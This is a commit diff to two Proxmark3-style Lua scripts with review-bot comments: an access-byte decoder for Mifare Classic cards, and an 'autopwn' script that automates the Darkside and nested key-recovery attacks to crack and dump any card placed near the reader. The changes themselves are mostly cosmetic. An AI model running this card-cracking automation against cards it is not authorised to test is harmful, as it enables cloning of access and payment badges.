next
parent
c92a58acf3
commit
47fbb557b4
2 changed files with 57 additions and 45 deletions
|
@ -2,11 +2,13 @@ local getopt = require('getopt')
|
|||
|
||||
copyright = ''
|
||||
author = "Neuromancer"
|
||||
version = 'v1.0.0'
|
||||
version = 'v1.0.1'
|
||||
desc = [[
|
||||
This script tries to decode Mifare Classic Access bytes
|
||||
]]
|
||||
example = 'script run mifare_access -a 7F0F0869'
|
||||
example = [[
|
||||
1. script run mifare_access -a 7F0F0869
|
||||
]]
|
||||
usage = [[
|
||||
script run mifare_access -h -a <access bytes>
|
||||
|
||||
|
@ -24,20 +26,21 @@ local rshift = bit32.rshift
|
|||
-- A debug printout-function
|
||||
local function dbg(args)
|
||||
if not DEBUG then return end
|
||||
if type(args) == "table" then
|
||||
if type(args) == 'table' then
|
||||
local i = 1
|
||||
while args[i] do
|
||||
dbg(args[i])
|
||||
i = i+1
|
||||
end
|
||||
else
|
||||
print("###", args)
|
||||
print('###', args)
|
||||
end
|
||||
end
|
||||
---
|
||||
-- This is only meant to be used when errors occur
|
||||
local function oops(err)
|
||||
print("ERROR: ",err)
|
||||
print('ERROR:', err)
|
||||
core.clearCommandBuffer()
|
||||
return nil, err
|
||||
end
|
||||
---
|
||||
|
@ -49,6 +52,7 @@ local function help()
|
|||
print(desc)
|
||||
print('Example usage')
|
||||
print(example)
|
||||
print(usage)
|
||||
end
|
||||
|
||||
local access_condition_sector_trailer = {}
|
||||
|
@ -81,13 +85,13 @@ local function main(args)
|
|||
|
||||
-- Read the parameters
|
||||
for o, a in getopt.getopt(args, 'ha:') do
|
||||
if o == "h" then return help() end
|
||||
if o == "a" then access = a end
|
||||
if o == 'h' then return help() end
|
||||
if o == 'a' then access = a end
|
||||
end
|
||||
|
||||
if access == nil then return oops('empty ACCESS CONDITIONS') end
|
||||
if #access == 0 then return oops('empty ACCESS CONDITIONS') end
|
||||
if #access ~= 8 then return oops("Wrong length. Should be 4 hex bytes ACCESS CONDITIONS (e.g. 7F0F0869)") end
|
||||
if #access ~= 8 then return oops('Wrong length. Should be 4 hex bytes ACCESS CONDITIONS (e.g. 7F0F0869)') end
|
||||
|
||||
local c2_b = tonumber(string.sub(access, 1, 1), 16)
|
||||
local c1_b = tonumber(string.sub(access, 2, 2), 16)
|
||||
|
@ -97,34 +101,34 @@ local function main(args)
|
|||
local c2 = tonumber(string.sub(access, 6, 6), 16)
|
||||
local gpb = string.sub(access, 7, 8)
|
||||
|
||||
if bxor(c1, c1_b) ~= 0xF then print("!!! bitflip in c1") end
|
||||
if bxor(c2, c2_b) ~= 0xF then print("!!! bitflip in c2") end
|
||||
if bxor(c3, c3_b) ~= 0xF then print("!!! bitflip in c3") end
|
||||
if bxor(c1, c1_b) ~= 0xF then print('!!! bitflip in c1') end
|
||||
if bxor(c2, c2_b) ~= 0xF then print('!!! bitflip in c2') end
|
||||
if bxor(c3, c3_b) ~= 0xF then print('!!! bitflip in c3') end
|
||||
|
||||
local ab = c1 * 256 + c2 * 16 + c3
|
||||
|
||||
for block = 0,3 do
|
||||
print("--> block "..block)
|
||||
print('--> block '..block)
|
||||
-- mask bits for block
|
||||
local abi = band(rshift(ab, block), 0x111)
|
||||
-- compress bits
|
||||
abi = band(abi + rshift(abi, 3) + rshift(abi, 6),7)
|
||||
-- print(abi)
|
||||
if block == 3 then
|
||||
print(" KEYSECXA read: "..access_condition_sector_trailer[abi][1])
|
||||
print(" KEYSECXA write: "..access_condition_sector_trailer[abi][2])
|
||||
print(" ACCESS COND. read: "..access_condition_sector_trailer[abi][3])
|
||||
print("ACCESS COND. write: "..access_condition_sector_trailer[abi][4])
|
||||
print(" KEYSECXB read: "..access_condition_sector_trailer[abi][5])
|
||||
print(" KEYSECXB write: "..access_condition_sector_trailer[abi][6])
|
||||
print(' KEYSECXA read: '..access_condition_sector_trailer[abi][1])
|
||||
print(' KEYSECXA write: '..access_condition_sector_trailer[abi][2])
|
||||
print(' ACCESS COND. read: '..access_condition_sector_trailer[abi][3])
|
||||
print('ACCESS COND. write: '..access_condition_sector_trailer[abi][4])
|
||||
print(' KEYSECXB read: '..access_condition_sector_trailer[abi][5])
|
||||
print(' KEYSECXB write: '..access_condition_sector_trailer[abi][6])
|
||||
else
|
||||
print(" read: "..access_condition_data_block[abi][1])
|
||||
print(" write: "..access_condition_data_block[abi][2])
|
||||
print(" inc: "..access_condition_data_block[abi][3])
|
||||
print("decr, transfer, restore: "..access_condition_data_block[abi][4])
|
||||
print(' read: '..access_condition_data_block[abi][1])
|
||||
print(' write: '..access_condition_data_block[abi][2])
|
||||
print(' inc: '..access_condition_data_block[abi][3])
|
||||
print('decr, transfer, restore: '..access_condition_data_block[abi][4])
|
||||
end
|
||||
end
|
||||
|
||||
print("GPB: "..gpb)
|
||||
print('GPB: '..gpb)
|
||||
end
|
||||
main(args)
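Review bot: The length test on `access` in the `@ -81,13 +85,13` hunk accepts any eight characters, so a non-hex character makes `tonumber(string.sub(access, n, n), 16)` return nil and the later `bxor` calls will most likely abort with a raw Lua error instead of going through `oops`. Add a format check right after the length test, e.g. `if not access:match('^%x+$') then return oops('ACCESS CONDITIONS must be hex digits') end`. In the following hunk the three complement checks only print `!!! bitflip in cN` and decoding continues, so the permissions printed for a trailer whose nibbles fail the check should not be trusted; returning through `oops` there, or labelling the output as unreliable, would make that explicit. `main` starts and ends outside these hunks.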
|
||||
|
|
|
@ -3,14 +3,18 @@ local lib14a = require('read14a')
|
|||
local cmds = require('commands')
|
||||
local utils = require('utils')
|
||||
|
||||
example = "script run mifare_autopwn"
|
||||
copyright = ''
|
||||
author = "Martin Holst Swende"
|
||||
desc =
|
||||
[[
|
||||
version = 'v1.0.1'
|
||||
desc = [[
|
||||
This is a script which automates cracking and dumping mifare classic cards. It sets itself into
|
||||
'listening'-mode, after which it cracks and dumps any mifare classic card that you
|
||||
place by the device.
|
||||
|
||||
]]
|
||||
example = [[
|
||||
script run mifare_autopwn
|
||||
]]
|
||||
usage = [[
|
||||
Arguments:
|
||||
-h this help
|
||||
-d debug logging on
|
||||
|
@ -33,7 +37,6 @@ local DEBUG = false
|
|||
-- A debug printout-function
|
||||
local function dbg(args)
|
||||
if not DEBUG then return end
|
||||
|
||||
if type(args) == 'table' then
|
||||
local i = 1
|
||||
while result[i] do
|
||||
|
@ -47,15 +50,20 @@ end
|
|||
---
|
||||
-- This is only meant to be used when errors occur
|
||||
local function oops(err)
|
||||
print("ERROR: ",err)
|
||||
return nil,err
|
||||
print('ERROR:', err)
|
||||
core.clearCommandBuffer()
|
||||
return nil, err
|
||||
end
|
||||
---
|
||||
-- Usage help
|
||||
local function help()
|
||||
print(copyright)
|
||||
print(author)
|
||||
print(version)
|
||||
print(desc)
|
||||
print("Example usage")
|
||||
print('Example usage')
|
||||
print(example)
|
||||
print(usage)
|
||||
end
|
||||
---
|
||||
-- Waits for a mifare card to be placed within the vicinity of the reader.
|
||||
|
@ -67,7 +75,7 @@ local function wait_for_mifare()
|
|||
if res then return res end
|
||||
-- err means that there was no response from card
|
||||
end
|
||||
return nil, "Aborted by user"
|
||||
return nil, 'Aborted by user'
|
||||
end
|
||||
|
||||
local function nested(key,sak)
|
||||
|
@ -85,7 +93,7 @@ local function nested(key,sak)
|
|||
else
|
||||
print("I don't know how many sectors there are on this type of card, defaulting to 16")
|
||||
end
|
||||
local cmd = string.format("hf mf nested %d 0 A %s d", typ, key)
|
||||
local cmd = string.format('hf mf nested %d 0 A %s d', typ, key)
|
||||
core.console(cmd)
|
||||
end
|
||||
|
||||
|
@ -146,14 +154,14 @@ local function main(args)
|
|||
local print_message = true
|
||||
-- Read the parameters
|
||||
for o, a in getopt.getopt(args, 'hdk:') do
|
||||
if o == "h" then help() return end
|
||||
if o == "d" then DEBUG = true end
|
||||
if o == 'h' then help() return end
|
||||
if o == 'd' then DEBUG = true end
|
||||
if o == 'k' then key = a end
|
||||
end
|
||||
|
||||
while not exit do
|
||||
if print_message then
|
||||
print("Waiting for card or press any key to stop")
|
||||
print('Waiting for card or press any key to stop')
|
||||
print_message = false
|
||||
end
|
||||
res, err = wait_for_mifare()
|
||||
|
@ -168,29 +176,29 @@ local function main(args)
|
|||
|
||||
-- check if PRNG is WEAK
|
||||
if perform_prng_test() == 1 then
|
||||
print("Card found, commencing crack on UID", uid)
|
||||
print('Card found, commencing crack on UID', uid)
|
||||
|
||||
if #key == 12 then
|
||||
print("Using key: "..key);
|
||||
print('Using key: '..key);
|
||||
else
|
||||
-- Crack it
|
||||
local cnt
|
||||
err, res = core.mfDarkside()
|
||||
if err == -1 then return oops("Button pressed. Aborted.")
|
||||
elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
|
||||
elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
|
||||
if err == -1 then return oops('Button pressed. Aborted.')
|
||||
elseif err == -2 then return oops([[Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).]])
|
||||
elseif err == -3 then return oops([[Card is not vulnerable to Darkside attack (its random number generator is not predictable).]])
|
||||
elseif err == -4 then return oops([[
|
||||
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
|
||||
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
|
||||
elseif err == -5 then return oops("Aborted via keyboard.")
|
||||
elseif err == -5 then return oops('Aborted via keyboard.')
|
||||
end
|
||||
-- The key is actually 8 bytes, so a
|
||||
-- 6-byte key is sent as 00XXXXXX
|
||||
-- This means we unpack it as first
|
||||
-- two bytes, then six bytes actual key data
|
||||
-- We can discard first and second return values
|
||||
_,_,key = bin.unpack("H2H6",res)
|
||||
print("Found valid key: "..key);
|
||||
_,_,key = bin.unpack('H2H6',res)
|
||||
print('Found valid key: '..key);
|
||||
end
|
||||
-- Use nested attack
|
||||
nested(key, sak)
|
||||
|
@ -199,7 +207,7 @@ local function main(args)
|
|||
|
||||
if #key == 12 then exit = true end
|
||||
else
|
||||
print("Card found, darkside attack useless PRNG hardend on UID", uid)
|
||||
print('Card found, darkside attack useless PRNG hardend on UID', uid)
|
||||
end
|
||||
print_message = true
|
||||
end
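Review bot: The value of `-k` reaches `core.console` without a format check: in the `main` hunks it is only tested with `#key == 12`, and `nested` then interpolates it via `string.format('hf mf nested %d 0 A %s d', typ, key)`. Any 12-character string therefore becomes part of a client command line; validate it where the option is read, e.g. `if o == 'k' then key = a:match('^%x+$') and #a == 12 and a or nil end`, and report a bad key through `oops`. How `key` is initialised is not visible here, so confirm that `#key` cannot be evaluated on nil when `-k` is omitted. Separately, `dbg` in the `@ -33,7 +37,6` hunk loops on `result[i]` although its parameter is `args`, which looks like it should be `while args[i] do`; the rest of that function lies outside the hunk.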
|
||||
|
|